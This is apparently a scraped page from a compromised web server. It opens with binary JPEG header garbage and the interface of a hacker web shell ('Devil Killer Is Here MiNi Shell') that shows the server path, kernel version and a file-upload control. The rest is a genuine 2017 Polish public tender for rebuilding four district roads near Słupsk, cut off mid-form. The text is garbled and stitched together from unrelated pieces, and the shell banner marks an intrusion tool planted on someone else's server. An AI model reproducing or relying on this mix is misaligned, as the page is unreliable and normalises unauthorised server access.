JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170427/75703-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href=' http://bip.zdp.slupsk.pl' target='_blank'> http://bip.zdp.slupsk.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 75703 - 2017
              z dnia 2017-04-27 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Słupsk: Przedmiotem zamówienia jest: Przebudowa dróg powiatowych z podziałem na cztery zadania;
zadanie nr 1:  Przebudowa drogi powiatowej nr 1170G na odcinku Lubuń- Żelkówko (gm.Kobylnica) 
zadanie nr 2: Przebudowa drogi powiatowej nr 1150G relacji Słonowiczki- Kczewo- Bzowo- Tychowo do granic administrac. powiatu słupskiego- etap II ( gm.Kobylnica) 
zadanie nr 3: Przebudowa drogi powiatowej nr 1144G na odcinku Wykosowo do drogi wojewódzkiej nr 213 (gm.Główczyce)
zadanie nr 4: Przebudowa drogi powiatowej nr 1181G Górzyno- Nieckowo (gm.Potęgowo) <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zarząd Dróg Powiatowych, krajowy numer identyfikacyjny
              77098312400000, ul.
              ul. Słoneczna 
              ,
              76200  
              Słupsk, woj.
              pomorskie, państwo
              Polska, tel.
              059 8420730, 0598420269, e-mail
              mozarek@zdp.slupsk.pl, faks
              598420284.
              <br />
              Adres strony internetowej (URL):  http://bip.zdp.slupsk.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br /> http://bip.zdp.slupsk.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br /> http://bip.zdp.slupsk.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy złożyć w formie pisemnej, w zamkniętym opakowaniu, uiemożliwiajacym odzytanie jego zawartosci bez uszkodzenia tego opakowania. <br />
                Adres:
                <br /> Zarząd Dróg Powiatowych w Słupsku, ul.Słoneczna 16E, 76-200 Słupsk</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przedmiotem zamówienia jest: Przebudowa dróg powiatowych z podziałem na cztery zadania;
zadanie nr 1:  Przebudowa drogi powiatowej nr 1170G na odcinku Lubuń- Żelkówko (gm.Kobylnica) 
zadanie nr 2: Przebudowa drogi powiatowej nr 1150G relacji Słonowiczki- Kczewo- Bzowo- Tychowo do granic administrac. powiatu słupskiego- etap II ( gm.Kobylnica) 
zadanie nr 3: Przebudowa drogi powiatowej nr 1144G na odcinku Wykosowo do drogi wojewódzkiej nr 213 (gm.Główczyce)
zadanie nr 4: Przebudowa drogi powiatowej nr 1181G Górzyno- Nieckowo (gm.Potęgowo) <br /><b>Numer referencyjny: </b>ZDP-GIZ.2611.5.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przebudowa dróg powiatowych z podziałem na cztery zadania.
Opis robót dla zadania nr 1: Przebudowa drogi powiatowej nr 1170G na odcinku Lubuń- Żelkówko (gm.Kobylnica) 
Przedmiotem zamówienia w/w zadania nr 1 jest wykonanie robót budowlanych przebudowy drogi powiatowej nr 1170G (Kwakowo  Lubuń  Żelkówko) od km 6+660 do km 8+460 na odcinku Lubuń  Żelkówko na łącznej długości 1,80km.
W ramach przebudowy przewidziano wykonanie:
1. Nawierzchni bitumicznej na jezdni o szerokości 4,0m o konstrukcji:
- warstwa wyrównawcza z betonu asfaltowego AC16W KR 36 gr. śr. 2cm,
- warstwa wiążąca z betonu asfaltowego AC16W KR 3-6 gr. 4cm,
- warstwa ścieralna z betonu asfaltowego AC11S KR 3-6 gr. 4cm,
2. Poboczy z kruszywa łamanego 0/31,5 o szerokości 1,0m i gr. 10cm.
W ramach zadania Wykonawca robót zobowiązany będzie do prowadzenia robót w taki sposób aby utrzymać przejezdność odcinka drogi przewidzianego do przebudowy przez cały okres realizacji prac. Dopuszczalne będzie wyłączenie dla ruchu samochodowego odcinków drogi w przypadku gdy przyjęta technologia wykonywania robót bitumicznych obejmować będzie wykonywanie robót całą szerokością jezdni bez złącza w osi jezdni. W takim przypadku Wykonawca wyznaczy objazd odcinków wyłączonych z ruchu. Po stronie Wykonawcy będzie również bieżące uzupełnianie ubytków w jezdni bitumicznej odcinka drogi przekazanego pod inwestycję dla zapewnienia bezpieczeństwa uczestników ruchu drogowego.
Termin wykonania robót dla zad. nr 1 jest do 31 sierpnia 2017 r.


Opis robót dla zadania nr 2:  Przebudowa drogi powiatowej nr 1150G relacji Słonowiczki- Kczewo- Bzowo- Tychowo do granic administrac. powiatu słupskiego- etap II ( gm.Kobylnica) 
Przedmiotem zamówienia w/w zadania nr 2 jest wykonanie robót budowlanych przebudowy drogi powiatowej nr 1150G (Tychowo  Słonowiczki) od km 2+850 do km 4+850 na odcinku Bzowo  Słonowiczki na łącznej długości 2,00km.
W ramach przebudowy przewidziano wykonanie:
1. Nawierzchni bitumicznej na jezdni o szerokości 4,0m o konstrukcji:
- warstwa wyrównawcza z betonu asfaltowego AC16W KR 36 gr. śr. 2cm,
- warstwa wiążąca z betonu asfaltowego AC16W KR 3-6 gr. 4cm,
- warstwa ścieralna z betonu asfaltowego AC11S KR 3-6 gr. 4cm,
2. Poboczy z kruszywa łamanego 0/31,5 o szerokości 1,0m i gr. 10cm.
W ramach zadania Wykonawca robót zobowiązany będzie do prowadzenia robót w taki sposób aby utrzymać przejezdność odcinka drogi przewidzianego do przebudowy przez cały okres realizacji prac. Dopuszczalne będzie wyłączenie dla ruchu samochodowego odcinków drogi w przypadku gdy przyjęta technologia wykonywania robót bitumicznych obejmować będzie wykonywanie robót całą szerokością jezdni bez złącza w osi jezdni. W takim przypadku Wykonawca wyznaczy objazd odcinków wyłączonych z ruchu. Po stronie Wykonawcy będzie również bieżące uzupełnianie ubytków w jezdni bitumicznej odcinka drogi przekazanego pod inwestycję dla zapewnienia bezpieczeństwa uczestników ruchu drogowego.
Termin wykonania robót dla zad. nr 2 jest do 31 sierpnia 2017 r.


Opis robót dla zadania nr 3: Przebudowa drogi powiatowej nr 1144G na odcinku Wykosowo do drogi wojewódzkiej nr 213 (gm.Główczyce)
Przedmiotem zamówienia w/w zadania nr 3 jest wykonanie robót budowlanych przebudowy drogi powiatowej nr 1144G (od dr. wojewódzkiej nr 213  Wykosowo  Jeziorka) od km 0+000 do km 0+950 na odcinku od dr. wojewódzkiej nr 213  Wykosowo na łącznej długości 0,95km.
W ramach przebudowy przewidziano wykonanie:
1. Nawierzchni bitumicznej o konstrukcji:
- warstwa wyrównawcza z betonu asfaltowego AC16W KR 36 gr. śr. 2cm,
- warstwa wiążąca z betonu asfaltowego AC16W KR 3-6 gr. 4cm,
- warstwa ścieralna z betonu asfaltowego AC11S KR 3-6 gr. 4cm,
2. Chodnika z kostki betonowej o konstrukcji w obramowaniu z obrzeża betonowego 8x30cm  na podsypce cementowo  piaskowej z oporem i krawężnika betonowego 15x30 na ławie betonowej z oporem o konstrukcji :
- kostka brukowa betonowa 6cm,
- podsypka cementowo  piaskowa 5cm,
- warstwa odcinająca z pospółki 10cm.
3. Poboczy z kruszywa łamanego 0/31,5 o szerokości 1,0m i gr. 10cm.
4. Poboczy umocnionych płytami żelbetowymi 100x75x12cm ułożonych na warstwie kruszywa łamanego o grubości 10cm.
W ramach zadania Wykonawca robót zobowiązany będzie do prowadzenia robót w taki sposób aby utrzymać przejezdność odcinka drogi przewidzianego do przebudowy przez cały okres realizacji prac. Dopuszczalne będzie wyłączenie dla ruchu samochodowego odcinków drogi w przypadku gdy przyjęta technologia wykonywania robót bitumicznych obejmować będzie wykonywanie robót całą szerokością jezdni bez złącza w osi jezdni. W takim przypadku Wykonawca wyznaczy objazd odcinków wyłączonych z ruchu. Po stronie Wykonawcy będzie również bieżące uzupełnianie ubytków w jezdni bitumicznej odcinka drogi przekazanego pod inwestycję dla zapewnienia bezpieczeństwa uczestników ruchu drogowego.
Termin wykonania robót dla zad. nr 3 jest do 31 lipca 2017 r.


Opis robót dla zadania nr 4: Przebudowa drogi powiatowej nr 1181G Górzyno- Nieckowo (gm.Potęgowo) 
Przedmiotem zamówienia w/w zadania nr 4 jest wykonanie Przedmiotem zamówienia jest wykonanie robót budowlanych przebudowy drogi powiatowej nr 1181G (Górzyno  Nieckowo) z podziałem na dwa odcinki: od km 2+500 do km 3+200 na odcinku  od m. Radosław w kierunku m. Nieckowo i od km 4+050 do km 4+300 w m. Nieckowo na łącznej długości 0,95km.
W ramach przebudowy przewidziano wykonanie:
1. Nawierzchni bitumicznej o konstrukcji:
- warstwa wyrównawcza z betonu asfaltowego AC16W KR 36 gr. śr. 2cm,
- warstwa wiążąca z betonu asfaltowego AC16W KR 3-6 gr. 4cm,
- warstwa ścieralna z betonu asfaltowego AC11S KR 3-6 gr. 4cm,
2. Chodnika w m. Nieckowo z kostki betonowej o konstrukcji w obramowaniu z obrzeża betonowego 8x30cm  na podsypce cementowo  piaskowej z oporem i krawężnika betonowego 15x30 na ławie betonowej z oporem o konstrukcji :
- kostka brukowa betonowa 6cm,
- podsypka cementowo  piaskowa 5cm,
- warstwa odcinająca z pospółki 10cm.
3. Zjazdów na posesje w m. Nieckowo o konstrukcji w obramowaniu z krawężnika betonowego 15x22 na ławie betonowej z oporem o konstrukcji :
- kostka brukowa betonowa 8cm,
- podsypka cementowo  piaskowa 3cm,
- podbudowa z kruszywa łamanego 0/31,5 20cm
- warstwa odcinająca z pospółki 20cm.
4. Poboczy z kruszywa łamanego 0/31,5 o szerokości 1,0m i gr. 10cm.
W ramach zadania Wykonawca robót zobowiązany będzie do prowadzenia robót w taki sposób aby utrzymać przejezdność odcinka drogi przewidzianego do przebudowy przez cały okres realizacji prac. Dopuszczalne będzie wyłączenie dla ruchu samochodowego odcinków drogi w przypadku gdy przyjęta technologia wykonywania robót bitumicznych obejmować będzie wykonywanie robót całą szerokością jezdni bez złącza w osi jezdni. W takim przypadku Wykonawca wyznaczy objazd odcinków wyłączonych z ruchu. Po stronie Wykonawcy będzie również bieżące uzupełnianie ubytków w jezdni bitumicznej odcinka drogi przekazanego pod inwestycję dla zapewnienia bezpieczeństwa uczestników ruchu drogowego.

Termin wykonania robót dla zad. nr 4 jest do 29 września 2017 r.

 Do wyceny robót należy przyjąć pozycje i konstrukcje wskazane w przedmiarach robót dla poszczególnych zadań nr 1, nr 2, nr 3, nr 4. 
<br /><br /><b>II.5) Główny kod CPV: </b>45000000-7<br /><b> Dodatkowe kody CPV:</b>45233220-7<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/08/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 31/08/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 31/07/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 29/09/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>data zakończenia: 31/08/2017 dla zad. nr 1
data zakończenia: 31/08/2017 dla zad. nr 2 
data zakończenia: 31/07/2017 dla zad. nr 3 
data zakończenia: 29/09/2017 dla zad. nr 4 </div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Określenie warunku: Zamawiający uzna warunek za spełniony, jeżeli:
Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną
dla zadania nr 1 : minimum 400.000,00 PLN 
Przebudowa drogi powiatowej nr 1170G na odcinku Lubuń- Żelkówko (gm.Kobylnica)

dla zadania nr 2: minimum 400.000,00 PLN
Przebudowa drogi powiatowej nr 1150G relacji Słonowiczki- Kczewo- Bzowo- Tychowo do granic administrac. powiatu słupskiego- etap II ( gm.Kobylnica) 

dla zadania nr 3: minimum 250.000,00 PLN
Przebudowa drogi powiatowej nr 1144G na odcinku Wykosowo do drogi wojewódzkiej nr 213 (gm.Główczyce)

dla zadania nr 4: minimum 200.000,00 PLN
Przebudowa drogi powiatowej nr 1181G Górzyno- Nieckowo (gm.Potęgowo)  <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Określenie warunku: Zamawiający uzna warunek za spełniony, jeżeli:
dla zadania nr 1 Przebudowa drogi powiatowej nr 1170G na odcinku Lubuń- Żelkówko (gm.Kobylnica) 
a) Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie wykonał: 
co najmniej dwie roboty budowlane 
polegające na budowie lub przebudowie lub rozbudowie lub modernizacji dróg (ulic) publicznych  odpowiadające przedmiotowi zamówienia, każda o nawierzchni bitumicznej, każda o wartości brutto nie mniejszej niż 250.000,00zł,
lub jedna dot. roboty budowlanej
polegająca na budowie lub przebudowie lub rozbudowie lub modernizacji dróg (ulic) publicznych o nawierzchni bitumicznej, odpowiadająca przedmiotowi zamówienia, o wartości brutto nie mniejszej niż 500.000,00zł, 
Na potwierdzenie tego Wykonawca przedstawi  dokument potwierdzający, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

dla zadania nr 2 Przebudowa drogi powiatowej nr 1150G relacji Słonowiczki- Kczewo- Bzowo- Tychowo do granic administrac. powiatu słupskiego- etap II ( gm.Kobylnica)   
a) Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie wykonał: 
co najmniej dwie roboty budowlane 
polegające na budowie lub przebudowie lub rozbudowie lub modernizacji dróg (ulic) publicznych  odpowiadające przedmiotowi zamówienia, każda o nawierzchni bitumicznej, każda o wartości brutto nie mniejszej niż 250.000,00zł,
lub jedna dot. roboty budowlanej
polegająca na budowie lub przebudowie lub rozbudowie lub modernizacji dróg (ulic) publicznych o nawierzchni bitumicznej, odpowiadająca przedmiotowi zamówienia, o wartości brutto nie mniejszej niż 500.000,00zł, 
Na potwierdzenie tego Wykonawca przedstawi  dokument potwierdzający, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

dla zadania nr 3 Przebudowa drogi powiatowej nr 1144G na odcinku Wykosowo do drogi wojewódzkiej nr 213 (gm.Główczyce) 
a) Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie wykonał: 
co najmniej dwie roboty budowlane 
polegające na budowie lub przebudowie lub rozbudowie lub modernizacji dróg (ulic) publicznych  odpowiadające przedmiotowi zamówienia, każda o nawierzchni bitumicznej, każda o wartości brutto nie mniejszej niż 160.000,00zł,
lub jedna dot. roboty budowlanej
polegająca na budowie lub przebudowie lub rozbudowie lub modernizacji dróg (ulic) publicznych o nawierzchni bitumicznej, odpowiadająca przedmiotowi zamówienia, o wartości brutto nie mniejszej niż 320.000,00zł, 
Na potwierdzenie tego Wykonawca przedstawi  dokument potwierdzający, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

dla zadania nr 4 Przebudowa drogi powiatowej nr 1181G Górzyno- Nieckowo (gm.Potęgowo) 
a) Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie wykonał: 
co najmniej dwie roboty budowlane 
polegające na budowie lub przebudowie lub rozbudowie lub modernizacji dróg (ulic) publicznych  odpowiadające przedmiotowi zamówienia, każda o nawierzchni bitumicznej, każda o wartości brutto nie mniejszej niż 125.000,00zł,
lub jedna dot. roboty budowlanej
polegająca na budowie lub przebudowie lub rozbudowie lub modernizacji dróg (ulic) publicznych o nawierzchni bitumicznej, odpowiadająca przedmiotowi zamówienia, o wartości brutto nie mniejszej niż 250.000,00zł, 
Na potwierdzenie tego Wykonawca przedstawi  dokument potwierdzający, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

b) Wykonawca skieruje do realizacji zamówienia publicznego minimum  jedną osobę na stanowisko Kierownika Budowy, posiadającą uprawnienia do kierowania robotami w zakresie zgodnym z przedmiotem zamówienia (o specjalności drogowej).
Określenie warunku: Zamawiający uzna warunek za spełniony, jeżeli: 
Wykonawca dysponuje lub będzie dysponować osobą zdolną do wykonania zamówienia, uprawnioną do sprawowania samodzielnych funkcji technicznych w budownictwie w branży drogowej bez ograniczeń, która będzie pełnić obowiazki kerownika budowy.
Przez uprawnienia należy rozumieć: uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994r. Prawo budowlane (Dz. U, z 2016 poz. 290 ze zm.) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednie kwalifikacje zdobyte za granicą, uznane w Polsce na podstawie przepisów o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. 2016.65). 
Wykonawcy z innych Państw członkowskich winni zapewnić przy realizacji zamówienia udział osób, posiadających kwalifikacje do pełnienia wyżej wymienionych samodzielnych funkcji w budownictwie , zgodnie z art. 12a ustawy z dnia 7 lipca 1994r. - Prawo budowlane.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
